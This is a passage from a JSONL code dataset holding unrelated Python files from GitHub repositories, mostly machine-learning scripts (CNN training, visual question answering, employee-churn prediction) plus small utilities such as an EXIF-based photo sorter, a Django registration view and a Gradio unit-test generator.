1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(ZeroPadding2D((1,1)))\r\nmodel.add(Conv2D(64,(3,3),strides=(1, 1)))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(MaxPooling2D((2,2),strides=(2,2)))\r\nmodel.add(Dropout(DROPOUT))\r\n\r\nmodel.add(Flatten())\r\nmodel.add(Dense(1024))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(Dropout(DROPOUT))\r\nmodel.add(Dense(512))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(Dropout(DROPOUT))\r\nmodel.add(Dense(256))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(Dropout(DROPOUT))\r\nmodel.add(Dense(128))\r\nmodel.add(BatchNormalization())\r\nmodel.add(Activation(\"relu\"))\r\nmodel.add(Dropout(DROPOUT))\r\n\r\nmodel.add(Dense(7))\r\nmodel.add(Activation(\"softmax\"))\r\nmodel.summary()\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='categorical_crossentropy',\r\n metrics=['accuracy'])\r\nmodel.fit(data,label,epochs=1,callbacks=callbacks,batch_size=128,validation_split=0.1)\r\n\r\n\r\nmodel.save('model.h5')\r\n","repo_name":"r05942017/ML2017FALL","sub_path":"hw3/hw3_train.py","file_name":"hw3_train.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18753686086","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nfrom keras.preprocessing import image\nfrom keras.applications.vgg16 import preprocess_input\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom Image_Captioning.model import *\nfrom Image_Captioning.batch_feature import image_features_model, load_image\nfrom Image_Captioning.process_caption import proc_caption\nimport cv2\nimport pickle as pk\nlabel_encoder = pk.load(open('label_encoder_lstm.sav','rb'))\n\n'''\nVQA Model configurations\n'''\n\nimg_dim = 4096\nword2vec_dim = 300\n#max_len = 30 # Required only when using Fixed-Length Padding\nnum_hidden_nodes_mlp = 1024\nnum_hidden_nodes_lstm = 512\nnum_layers_mlp = 3\nnum_layers_lstm = 3\ndropout = 0.5\nactivation_mlp = 'tanh'\n\n'''\nImage captioning model configurations\n'''\n\ntotal_size =100000\ntop_k = 5000\nembedding_dim = 256\nunits = 512\nvocab_size = top_k + 1 \nattention_features_shape = 64\n\n\n\ndef load_image_features_model():\n ''' \n Returns the image features extracting model\n '''\n\n base_model = tf.keras.applications.VGG16(weights='imagenet')\n image_model = tf.keras.Model(inputs=base_model.input, outputs=base_model.layers[-2].output)\n return image_model\n\nimage_model = load_image_features_model()\n\ndef get_image_features(image_model, image_path):\n ''' Returns numpy array\n Extracts the image features using VGG16\n\n Args:\n image_model: image features extracting model\n image_path: location of image\n '''\n\n img = cv2.imread(image_path)\n I = cv2.resize(img, (224, 224)) # - np.array((103.939, 116.779, 123.680), dtype=np.float32)\n x = image.img_to_array(I)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n image_features = image_model.predict(x)\n image_features = np.asarray(image_features, dtype=np.float32)\n return image_features\n\ndef get_question_features(question, nlp):\n ''' Returns numpy array\n Converts the question into an array of vectors using word2vec model\n\n Args:\n question: question in string format\n nlp: word2vec model\n '''\n\n tokens = nlp(question)\n question_features = np.zeros((1, len(tokens), 300))\n for j in range(len(tokens)):\n question_features[0,j,:] = tokens[j].vector\n return question_features\n\ndef load_vqa_model():\n '''\n Forms, compiles, and returns the VQA model\n '''\n\n image_model = tf.keras.Sequential([tf.keras.layers.Reshape(input_shape = (img_dim,), target_shape=(img_dim,), name='Feeding_image_vectors_size_4096')], name='Image_Model')\n image_model.add(tf.keras.layers.Dense(num_hidden_nodes_mlp, kernel_initializer='uniform', name = 'Image_MLP_Hidden_layer_size_1024'))\n image_model.add(tf.keras.layers.Activation('tanh', name='Image_MLP_Activation_tanh'))\n image_model.add(tf.keras.layers.Dropout(0.5, name='Image_MLP_Dropout_0.5'))\n\n language_model = tf.keras.Sequential([tf.keras.layers.LSTM(num_hidden_nodes_lstm,return_sequences=True, input_shape=(None, word2vec_dim), name='Feeding_question_vectors_to_LSTM_Layer_1'),\n tf.keras.layers.LSTM(num_hidden_nodes_lstm, return_sequences=True, name='LSTM_layer_2'),\n tf.keras.layers.LSTM(num_hidden_nodes_lstm, return_sequences=False, name='LSTM_layer_3')\n ], name = 'Language_Model')\n language_model.add(tf.keras.layers.Dense(num_hidden_nodes_mlp, kernel_initializer='uniform', name = 'Question_MLP_Hidden_layer_size_1024'))\n language_model.add(tf.keras.layers.Activation('tanh', name='Question_MLP_Activation_tanh'))\n language_model.add(tf.keras.layers.Dropout(0.5, name='Question_MLP_Dropout_0.5'))\n\n upper_lim = 1000 \n\n merged=tf.keras.layers.concatenate([language_model.output,image_model.output], axis =-1, name='Merging_language_model_and_image_model')\n\n model =tf.keras.Sequential(name='CNN_LSTM_Model')(merged)\n model = tf.keras.layers.Dense(num_hidden_nodes_mlp, kernel_initializer='uniform', name = 'Combined_MLP_Hidden_layer_size_1024')(model)\n model = tf.keras.layers.Activation('tanh', name='Combined_MLP_Activation_tanh')(model)\n model = tf.keras.layers.Dropout(0.5, name='Combined_MLP_Dropout_0.5')(model)\n model = tf.keras.layers.Dense(upper_lim, name='Fully_Connected_Output_layer_size_1000')(model)\n out = tf.keras.layers.Activation(\"softmax\", name='Softmax_Output_Probablities')(model)\n model = tf.keras.Model([language_model.input, image_model.input], out, name='LSTM_CNN_Model')\n model.load_weights('weights_cnn_lstm_v2/LSTM_1000classes_epoch_59.hdf5')\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop')\n return model\n\ndef predict_answer(model, nlp, question, image_path):\n ''' Returns a string\n Gets the image features and questions features, and predicts the answer using VQA model\n\n Args:\n model: VQA model\n nlp: word2vec model\n question: question in string format\n ''' \n\n image_features = get_image_features(image_model,image_path)\n question_features = get_question_features(question, nlp)\n input_data = [question_features, image_features]\n y_predict = model.predict(input_data, verbose=0)\n y_predict = np.argmax(y_predict,axis=1)\n return label_encoder.inverse_transform(y_predict)[0]\n\ndef load_image_caption_model():\n ''' Returns encoder model, decoder model image_features_extract_model, tokenizer and max length of caption\n Forms, compiles, and loads the image caption model\n '''\n\n train_captions,img_name_vector = np.load('./Image_Captioning/traincaption_imgname.npy')\n img_name_vector = img_name_vector[:total_size].tolist()\n train_captions = train_captions[:total_size].tolist()\n\n image_features_extract_model = image_features_model()\n \n _, tokenizer, max_length = proc_caption(train_captions) \n\n #MODEL STARTS HERE\n encoder = CNN_Encoder(embedding_dim)\n decoder = RNN_Decoder(embedding_dim, units, vocab_size)\n\n #OPTIMIZER \n optimizer = tf.keras.optimizers.Adam()\n\n #CHECKPOINTS\n checkpoint_path = \"./Image_Captioning/checkpoints/train100000\"\n ckpt = tf.train.Checkpoint(encoder=encoder,decoder=decoder,optimizer = optimizer)\n ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5)\n\n if ckpt_manager.latest_checkpoint:\n # restoring the latest checkpoint in checkpoint_path\n ckpt.restore(ckpt_manager.latest_checkpoint).expect_partial()\n\n return encoder, decoder, image_features_extract_model, tokenizer, max_length\n\ndef generate_caption(image_path, encoder, decoder, image_features_extract_model, tokenizer, max_length):\n ''' Returns string and tensorflow object\n Given an image, generates a caption\n\n Args:\n image_path: location of the image\n encoder: encoder model\n decoder: decoder model\n image_features_extract_model: model which extracts the image features\n tokenizer: tokenizer \n max_length: maximum length of the caption\n '''\n\n attention_plot = np.zeros((max_length, attention_features_shape))\n\n hidden = decoder.reset_state(batch_size=1)\n\n temp_input = tf.expand_dims(load_image(image_path)[0], 0)\n img_tensor_val = image_features_extract_model(temp_input)\n img_tensor_val = tf.reshape(img_tensor_val, (img_tensor_val.shape[0], -1, img_tensor_val.shape[3]))\n\n features = encoder(img_tensor_val)\n\n dec_input = tf.expand_dims([tokenizer.word_index['']], 0)\n result = []\n\n for i in range(max_length):\n predictions, hidden, attention_weights = decoder(dec_input, features, hidden)\n\n attention_plot[i] = tf.reshape(attention_weights, (-1, )).numpy()\n\n predicted_id = tf.random.categorical(predictions, 1)[0][0].numpy()\n result.append(tokenizer.index_word[predicted_id])\n\n if tokenizer.index_word[predicted_id] == '':\n return result, attention_plot\n\n dec_input = tf.expand_dims([predicted_id], 0)\n\n attention_plot = attention_plot[:len(result), :]\n return result, attention_plot\n\ndef plot_image_caption_attention(result, attention_plot, image):\n '''\n Plots the attention over the image\n '''\n \n temp_image = np.array(Image.open(image))\n n=0\n fig = plt.figure(num=n, figsize=(120,120))\n\n len_result = len(result)\n j =0\n for l in range(len_result):\n #print(\"l is:\", l, len_result, \"len_result//6\", len_result//6)\n temp_att = np.resize(attention_plot[l], (8, 8))\n if((l%10)==0 and l >0):\n #ax = fig.add_subplot(len_result//6, len_result//6, l+1)\n n+=1\n j =0\n fig = plt.figure( num=n,figsize=(120,120))\n ax = fig.add_subplot(3,4, j+1)\n else:\n ax = fig.add_subplot(3,4,j+1)\n j+=1\n ax.set_title(result[l])\n img = ax.imshow(temp_image)\n ax.imshow(temp_att, cmap='gray', alpha=0.6, extent=img.get_extent())\n plt.tight_layout(pad=50, w_pad=50.0, h_pad=50.0)\n \n plt.tight_layout(pad=50, w_pad=50.0, h_pad=50.0)\n plt.show()","repo_name":"shivmohith/Visual-Assistance-for-the-Blind","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9246,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"74607061287","text":"'''Buatlah program yang dapat menerima inputan berupa angka \r\ndengan ketentuan sebagai berikut:\r\n1. Angka yang dimasukkan melalui input adalah batas atas \r\nangka\r\n2. Program menampilkan jumlah angka yang habis dibagi 3\r\nContoh angka yang diinput adalah 10, maka jawabannya \r\nadalah 3, karena ada 3 angka yang habis dibagi 3 yaitu 3, 6 \r\ndan 9 '''\n\nangka = int(input(\"angka : \" ))\n\nfor i in range (3,angka+1,3):\n\tprint(i)\n","repo_name":"Rhmawthy/days100_coding","sub_path":"sisah bagi3.py","file_name":"sisah bagi3.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7493840977","text":"import importlib\nimport torch\n\nfrom gem.models.sensor.run_utils import config_sensor, get_sensor_by_checkpoint\nfrom gem.models.predictor.run_utils import config_predictor, get_predictor_by_checkpoint\nfrom gem.controllers.run_utils import config_controller, get_controller_by_checkpoint\nfrom gem.envs.imagine import Imagine\n\ndef config_serial_agent(config):\n sensor_param = {\n \"c\" : config['image_channel'],\n \"h\" : config['image_size'],\n \"w\" : config['image_size'],\n }\n\n sensor, sensor_param, _ = config_sensor(config, sensor_param)\n predictor, predictor_param, _ = config_predictor(config)\n world_model = Imagine(sensor, predictor, with_emb=config['with_emb'])\n config['state_dim'] = world_model.state_dim\n config['action_dim'] = world_model.action_dim\n controller, controller_param, _ = config_controller(config)\n\n filename = '_'.join([config['controller'], config['predictor'], config['sensor'], config['env']])\n if len(config['suffix']) > 0:\n filename = filename + '_' + config['suffix']\n\n return world_model, controller, sensor_param, predictor_param, controller_param, filename\n\ndef get_serial_agent_by_checkpoint(checkpoint, eval_mode=True):\n sensor = get_sensor_by_checkpoint(checkpoint, eval_mode=eval_mode)\n predictor = get_predictor_by_checkpoint(checkpoint, eval_mode=eval_mode)\n controller = get_controller_by_checkpoint(checkpoint, eval_mode=eval_mode)\n\n return sensor, predictor, controller","repo_name":"IcarusWizard/GEM","sub_path":"gem/serial/run_utils.py","file_name":"run_utils.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42490122282","text":"# UNI: jjl2245, me2680\n\"\"\"Formats the Korean OpenSLR dataset\"\"\"\n\nfrom os import listdir\nfrom os.path import isfile, join, exists\nimport csv\nimport sys\nfrom pandas import read_csv\nimport numpy\n\npath = '../../data/KR' # set the KR data root directory\ndef get_files_folders(path): # gets all files and folders in a directory\n files = [f for f in listdir(path) if isfile(join(path, f))] # gets the files\n folders = [f for f in listdir(path) if not isfile(join(path, f))] # gets the folders\n return files, folders \n\nfiles, folders = get_files_folders(path) \nfor folder in folders: # for each folder\n temp_path = path + '/' + folder # join the paths to make a new path\n temp_path = temp_path + '/' + get_files_folders(temp_path)[-1][0]\n \n in_files, in_folders = get_files_folders(temp_path) # Get the files and folders within this filepath\n text_files = [] # store the text files\n for file in in_files: # for each file\n if file.endswith('.trans.txt'): # if it ends with 'trans.txt' \n text_files.append(file) # when store it in the text files list\n text_file = text_files[0] # we start with the first text file\n\n with open(temp_path + '/' + text_file) as f: # open the text file\n lines = f.readlines() # read all lines\n for line in lines: # for each line\n split = line.split(\" \", 1) # split it by space but only after splitting it once\n this_file = split[0] # the first part is the file name\n text = split[-1] # the rest of it is a transcription\n if exists(temp_path + '/' + this_file + '.flac'): # if there existsa flac file correesponding to the filename\n with open(temp_path + '/' + this_file + '.txt', 'w') as f: # open the text file corresponding to it\n f.write(text) # write the transcription \n\n \n\n\n\n \n\n\n","repo_name":"jjlee0802cu/open-set-lid","sub_path":"s5_r3/scripts/scripts_data/KR_formater.py","file_name":"KR_formater.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32656017594","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# Connecting to existing Azure Machine Learning workspace\nimport os\nfrom azureml.core import Workspace\nfrom azureml.core.authentication import ServicePrincipalAuthentication\n\nws = Workspace.get(name='ws_employee_churn', auth=None, subscription_id='9c43f403-ce9b-4e3a-8f7f-21b1688e2873', resource_group='rg_datascience')\ncluster_type = os.environ.get(\"AML_COMPUTE_CLUSTER_TYPE\", \"CPU\")\ncompute_target = ws.get_default_compute_target(cluster_type)\n\n\n# In[ ]:\n\n\n#Read and pre-process data\nimport pandas as pd\nimport numpy as np\n\nhr = pd.read_csv('HR_Data.csv')\ncol_names = hr.columns.tolist()\n\ncol_names\ncat_vars=['Age Bucket', 'Decade', 'Gender', 'Marital Status', 'Cost Center', 'Managed By', 'Designation', 'Employee Band', 'Experience']\nfor var in cat_vars:\n cat_list='var'+'_'+var\n cat_list = pd.get_dummies(hr[var], prefix=var,drop_first=False)\n hr1=hr.join(cat_list)\n hr=hr1\n\nhr.drop(hr.columns[[0,1,2,3,4,5,6,7,8,9]], axis=1, inplace=True)\nhr.columns.values\n\nhr_vars=hr.columns.values.tolist()\ny=['Left']\nX=[i for i in hr_vars if i not in y]\n\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils import resample\n#\n# Convert dataframe into numpy objects and split them into\n# train and test sets: 80/20\nX = hr.loc[:, hr.columns != \"Left\"].values\ny = hr.loc[:, hr.columns == \"Left\"].values.flatten()\nX_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.2, stratify=y, random_state=1)\n\nX_train_u, y_train_u = resample(X_train[y_train == 1],\n y_train[y_train == 1],\n replace=True,\n n_samples=X_train[y_train == 0].shape[0],\n random_state=1)\nX_train_u = np.concatenate((X_train[y_train == 0], X_train_u))\ny_train_u = np.concatenate((y_train[y_train == 0], y_train_u))\nprint(\"Upsampled shape:\", X_train_u.shape, y_train_u.shape)\n\n\nfrom sklearn.pipeline import make_pipeline\n\n\n# In[ ]:\n\n\n# Build and register Random forest classifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.externals import joblib\nfrom azureml.core import Run\n\nrun = Run.get_context()\nrf = RandomForestClassifier(n_estimators=10,max_features = \"sqrt\",\n min_samples_leaf=5,criterion=\"entropy\",class_weight=\"balanced\")\nrf.fit(X_train_d, y_train_d)\n\n# Place the model file in the outputs folder.\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(value=rf, filename='outputs/emp_churn_model_rf.pkl')\n\n# register the model Azure \nmodel = Model.register(model_path = \"outputs/emp_churn_model_rf.pkl\",\n model_name = \"emp_churn_model_rf\",\n tags = {'area': \"employee churn\", 'type': \"random forest\"},\n description = \"Random forest model to predict employee churn\",\n workspace = ws)\nprint(model.name, model.id, model.version, sep='\\t')\n\n\n# In[ ]:\n\n\n#Build and register Logistic regression model\nfrom sklearn.linear_model import LogisticRegression\nfrom azureml.core import Run\nfrom sklearn.externals import joblib\nfrom azureml.core.model import Model\n\nrun = Run.get_context()\n\nlogmod = LogisticRegression(solver = \"liblinear\",C=0.5,penalty=\"l2\",fit_intercept=True,class_weight=\"balanced\")\nlogmod.fit(X_train_u, y_train_u)\n\nfrom sklearn.metrics import accuracy_score\nprint('Logistic regression accuracy: {:.3f}'.format(accuracy_score(y_test, logmod.predict(X_test))))\n\n# Place the model file in the outputs folder.\nos.makedirs('outputs', exist_ok=True)\njoblib.dump(value=logmod, filename='outputs/emp_churn_model.pkl')\n\n# register the model Azure \nmodel = Model.register(model_path = \"outputs/emp_churn_model.pkl\",\n model_name = \"emp_churn_model\",\n tags = {'area': \"employee churn\", 'type': \"regression\"},\n description = \"Logistic regression model to predict employee churn\",\n workspace = ws)\nprint(model.name, model.id, model.version, sep='\\t')\n\n\n# In[ ]:\n\n\nprint(run.get_file_names())\n\n\n# In[ ]:\n\n\nfrom azureml.core import Workspace\nfrom azureml.core.model import Model\nimport os \n\nmodel=Model(ws, 'emp_churn_model')\nmodel.download(target_dir=os.getcwd(), exist_ok=True)\n\n# verify the downloaded model file\nfile_path = os.path.join(os.getcwd(), \"emp_churn_model.pkl\")\n\nos.stat(file_path)\n\n\n# In[ ]:\n\n\n#Code snippet to check the web service\nimport requests\nimport json\nimport pandas as pd\nfrom azureml.core.model import Model\nfrom sklearn.externals import joblib\n\n\nhr = pd.read_csv('predictions.csv')\nscoring_uri = 'http://690e1634-fd94-4f55-a10e-bc3a57004dd2.southeastasia.azurecontainer.io/score'\n# If the service is authenticated, set the key\nkey = ''\n\n\n# Convert to JSON string\ninput_data = hr.to_json(orient='records')\n\n# Set the content type\nheaders = {'Content-Type': 'application/json'}\n\n# Make the request and display the response\nresp = requests.post(scoring_uri, input_data, headers=headers)\nprint(resp.text)\n\n\n# In[ ]:\n\n\nimport pandas as pd\n#input_df = pd.read_json(input_df, orient='records')\ninput_df_encoded = input_df\n\ncolumns_encoded = ['Age Bucket_20', 'Age Bucket_30', 'Age Bucket_40',\n 'Age Bucket_Teen', 'Decade_60', 'Decade_70', 'Decade_80',\n 'Decade_90', 'Gender_F', 'Gender_M', 'Marital Status_Married',\n 'Marital Status_Unmarried', 'Cost Center_Abbott - A',\n 'Cost Center_Abbott - B', 'Cost Center_Abbott - C',\n 'Cost Center_CPL', 'Cost Center_Cadila Pharma',\n 'Cost Center_Cassel', 'Cost Center_East', 'Cost Center_Elite',\n 'Cost Center_Endo', 'Cost Center_FDC', 'Cost Center_Fourrts',\n 'Cost Center_Galderma', 'Cost Center_Glenmark Cuticare',\n 'Cost Center_Glenmark General', 'Cost Center_Hilton',\n 'Cost Center_Indus', 'Cost Center_Innova', 'Cost Center_Lifescan',\n 'Cost Center_Magna', 'Cost Center_North', 'Cost Center_North ',\n 'Cost Center_Novo HI', 'Cost Center_SKF', 'Cost Center_Surelife ',\n 'Cost Center_Unison', 'Cost Center_Zydus Alidac',\n 'Cost Center_Zydus Allidac', 'Cost Center_Zydus CND',\n 'Cost Center_Zydus CND ', 'Cost Center_Zydus Cadila',\n 'Cost Center_Zydus Cardiva', 'Cost Center_Zydus Respicare',\n 'Managed By_Principle Managed', 'Managed By_SHL Managed',\n 'Designation_Assistant Field Manager', 'Designation_Field Manager',\n 'Designation_Medical Advicer',\n 'Designation_Medical Marketing Executive',\n 'Designation_Medical Representative',\n 'Designation_Senior Field Manager',\n 'Designation_Senior Medical Marketing Executive',\n 'Designation_Senior Product Specialist', 'Employee Band_5',\n 'Employee Band_6', 'Employee Band_7', 'Experience_Fresher',\n 'Experience_Non Pharma', 'Experience_Other', 'Experience_Pharma']\n \ncat_vars=['Age Bucket', 'Decade', 'Gender', 'Marital Status', 'Cost Center', 'Managed By', 'Designation', 'Employee Band', 'Experience']\nfor var in cat_vars:\n cat_list='var'+'_'+var\n cat_list = pd.get_dummies(input_df[var], prefix=var,drop_first=False)\n hr1=input_df.join(cat_list)\n input_df=hr1\nfor column_encoded in columns_encoded:\n if not column_encoded in input_df.columns:\n input_df_encoded[column_encoded] = 0\n \nprint(input_df_encoded.columns)\nprint(input_df.columns)\n\n\n# In[ ]:\n\n\nprint(input_df_encoded)\ndf_cd = pd.merge(input_df_encoded, input_df, how='inner')\ndf_cd\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"mewanalwis/ChurnPrediction","sub_path":"ChurnModel.py","file_name":"ChurnModel.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42447854372","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\ndist = list()\ntime = list()\n\nfp = open(sys.argv[1])\n\n#read file\nwhile fp:\n line = fp.readline()\n if line:\n x, y = line.split()\n time.append(float(x))\n dist.append(float(y))\n else:\n break\n\n#moving standard deviation\ndist_pd = pd.Series(dist)\nstd = dist_pd.std()\n\n#Avogadro number\nNa = 6.0221409 * 10 ** 23\n\n#Boltzmann constant (J/K)\nk_b = 1.380649 * 10 ** (-23)\n\n#temperature 310 K\nTemp = 310\n\n#formula\nk_therm = k_b * Temp * Na / 1000 / (std ** 2)\n\n#result\nprint(\"k_thermal is \" + str(k_therm) + \" kJ/mol/A^2\")\n","repo_name":"wang-py/Q10_entrance_plots","sub_path":"k_calculator.py","file_name":"k_calculator.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4510154913","text":"import os\nimport magic\nimport exifread\nimport datetime\nimport tempfile\nfrom shutil import copyfile\n\n########## NOTES\n# Checking for duplicates\n# 1. List file paths with their sizes\n# 2. From previous list create another one with files of same size and their md5 sums\n# 3. Check for duplicate md5 sums\n#\n########## TO-DO List\n# Check for duplicates\n# Tests!\n# More interactive\n# Refactor setOutputDirectory and iterateFiles\n# Other exif filters\n# Yaps readme, help messages\n#\n\n\nclass Yaps:\n def __init__(self, logger):\n self.logger = logger\n self.UNKNOWN_DIR = 'unknown_date'\n self.directory = ''\n self.outputDirectory = ''\n self.sizeListFile = False\n\n def setDirectory(self, directory):\n if(os.path.isdir(directory)):\n self.directory = directory\n else:\n raise FileNotFoundError('Directory not found')\n\n def setOutputDirectory(self, directory):\n if(os.path.isdir(directory)):\n if not os.access(directory, os.W_OK):\n raise Exception('Directory not writable')\n\n self.outputDirectory = directory\n else:\n raise FileNotFoundError('Output directory not found')\n\n def checkDuplicates(self):\n self.sizeListFile = self.createSizeListFile()\n self.storeFilesSize()\n sameSizeList = self.checkForSameSize()\n \n\n def createSizeListFile(self):\n temporaryFile = tempfile.TemporaryFile('a+')\n self.logger.putLog(str(temporaryFile))\n return temporaryFile\n\n def storeFilesSize(self):\n for filename in os.listdir(self.directory):\n size = str(os.path.getsize(self.directory + '/' + filename))\n self.sizeListFile.write(filename + \"\\t\" + size + \"\\n\")\n self.logger.putLog(filename + \"\\t\" + size)\n\n def checkForSameSize(self):\n with open(self.sizeListFile) as file:\n print(list())\n\n def iterateFiles(self):\n for filename in os.listdir(self.directory):\n self.logger.putLog('File found: ' + filename)\n fullFilePath = self.directory + '/' + filename\n if(os.path.isdir(fullFilePath)):\n continue\n if(self.checkIfImage(fullFilePath)):\n imageDate = self.readExifData(fullFilePath)\n\n if imageDate:\n dirName = self.getDirNameByDate(imageDate)\n else:\n dirName = self.UNKNOWN_DIR\n\n self.createDirIfNotExist(dirName)\n\n if(self.outputDirectory):\n target = self.outputDirectory + '/' + dirName + '/' + filename\n else:\n target = './' + dirName + '/' + filename\n self.copyFileIfNotExist(fullFilePath, target)\n\n def checkIfImage(self, filename):\n BMP_MIME = 'image/bmp'\n JPEG_MIME = 'image/jpeg'\n GIF_MIME = 'image/gif'\n\n mime = magic.Magic(mime=True)\n file_mime = mime.from_file(filename)\n if(file_mime == BMP_MIME or file_mime == JPEG_MIME or file_mime == GIF_MIME):\n return True\n else:\n return False\n\n def readExifData(self, filename):\n f = open(filename, 'rb')\n tags = exifread.process_file(f, details=False)\n f.close()\n\n if 'EXIF DateTimeOriginal' in tags:\n self.logger.putLog(\"Picture was shot on: \" + str(tags['EXIF DateTimeOriginal']))\n return tags['EXIF DateTimeOriginal'].values\n else:\n return False\n\n def getDirNameByDate(self, date):\n try:\n return datetime.datetime.strptime(date, '%Y:%m:%d %H:%M:%S').strftime('%Y-%m-%d')\n except (ValueError, TypeError):\n return self.UNKNOWN_DIR\n\n def createDirIfNotExist(self, name):\n if(self.outputDirectory):\n directory = self.outputDirectory + '/' + name\n else:\n directory = './' + name\n\n if(os.path.isdir(directory)):\n return\n os.mkdir(directory)\n\n def copyFileIfNotExist(self, src, target):\n return copyfile(src, target)\n\n def help(self):\n pass\n","repo_name":"PoliPyc/YAPS","sub_path":"src/yaps/yaps.py","file_name":"yaps.py","file_ext":"py","file_size_in_byte":4133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22963129897","text":"# -*- coding:utf-8 -*-\nfrom django.shortcuts import render, redirect\nfrom .forms import RegisterForm\nfrom django.core.mail import send_mail\nfrom django.conf import settings\n\n# Create your views here.\ndef register(request):\n #从 get 或者 post 请求中获取next 参数值\n # get 请求中 next 通过 url 传递,即 /?next = value\n # post 请求中,next 通过表单传递,即\n redirect_to = request.POST.get('next', request.GET.get('next', ''))\n if request.method == 'POST':\n #实例化一个用户注册表单数据\n form = RegisterForm(request.POST)\n #验证数据的合法性\n if form.is_valid():\n form.save()\n #注册成功,跳转回首页\n if redirect_to:\n return redirect(redirect_to)\n else:\n return redirect('/')\n else:\n #不是post请求,展示一个空的注册表单给用户\n form = RegisterForm()\n # 渲染模板\n # 如果用户正在访问注册页面,则渲染的是一个空的注册表单\n # 如果用户通过表单提交注册信息,但是数据验证不合法,则渲染的是一个带有错误信息的表单\n return render(request, 'wechat/register.html', context={'form':form,'next':redirect_to})\n\ndef index(request):\n return render(request, 'index.html')\n\ndef send(request):\n if request.method == 'POST':\n email = request.POST.get('email')\n print(email)\n #tulps = eval(email)\n #print(tulps)\n msg='你收到这封邮件是因为你请求重置你在网站 127.0.0.1:8000上的用户账户密码。请访问该页面并选择一个新密码:http://127.0.0.1:8000/users/reset/NA/4n8-64ab7ff92254d18c6b15/
你的用户名,如果已忘记的话: admin
感谢使用我们的站点!
127.0.0.1:8000 团队'\n send_mail('测试邮件01',\n msg,\n settings.EMAIL_FROM,\n [email])\n return render(request, 'registration/password_reset_done.html')\n\n\n\n\n","repo_name":"tengxt/wechatSystem","sub_path":"wechat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16512292007","text":"'''给定一个非空整数数组,除了某个元素只出现一次以外,其余每个元素均出现两次。找出那个只出现了一次的元素。\n\n说明:\n\n你的算法应该具有线性时间复杂度。 你可以不使用额外空间来实现吗?\n\n示例 1:\n\n输入: [2,2,1]\n输出: 1\n示例 2:\n\n输入: [4,1,2,1,2]\n输出: 4'''\n# 数学真神奇 操\n\nclass Solution:\n def singleNumber(self, nums: 'List[int]') -> 'int':\n a = 0\n for num in nums:\n #print (num)\n a = a ^ num\n print (a)\n return a\ns=Solution()\nb=[1,2,3,4,4,3,2]\nprint(s.singleNumber(b))","repo_name":"xuejieshougeji0826/leetcode_top100","sub_path":"136.py","file_name":"136.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28614303310","text":"import gradio as gr\nimport random\nimport time\nfrom unit_test_generator_yield import unit_tests_from_function\nfrom threading import Thread\n\nwith gr.Blocks() as demo:\n msg = gr.TextArea(lines=20, placeholder=\"Enter your function under test here\")\n chatbot = gr.Chatbot()\n submit_button = gr.Button(\"Submit\")\n clear = gr.ClearButton([msg, chatbot])\n\n def user(user_message, history):\n return user_message, history + [[None, None]]\n\n def bot(msg, history):\n def print_to_console(text: str, end: str = \"\\n\"):\n if end == \"\\n\":\n # create a new entry in the history\n history.append([\"\", \"\"])\n history[-1][1] += text\n print(text, end=end)\n yield history\n yield from unit_tests_from_function(msg, print_text=True, print_function=print_to_console, approx_min_cases_to_cover=10)\n\n def on_submit_click():\n chatbot.clear()\n bot_thread = Thread(target=bot, args=(msg.get(), chatbot))\n bot_thread.start()\n\n response = submit_button.click(user, [msg, chatbot], [msg, chatbot], queue=False).then(\n bot, [msg, chatbot], [chatbot]\n )\n\ndemo.queue()\ndemo.launch()\n","repo_name":"coderfengyun/chat-confluence","sub_path":"unit_test_bot_gradio.py","file_name":"unit_test_bot_gradio.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"4996622586","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n@Author: LEGEND\n@since: 2019-12-22 11:35:22\n@lastTime: 2020-06-06 17:16:42\n@FilePath: 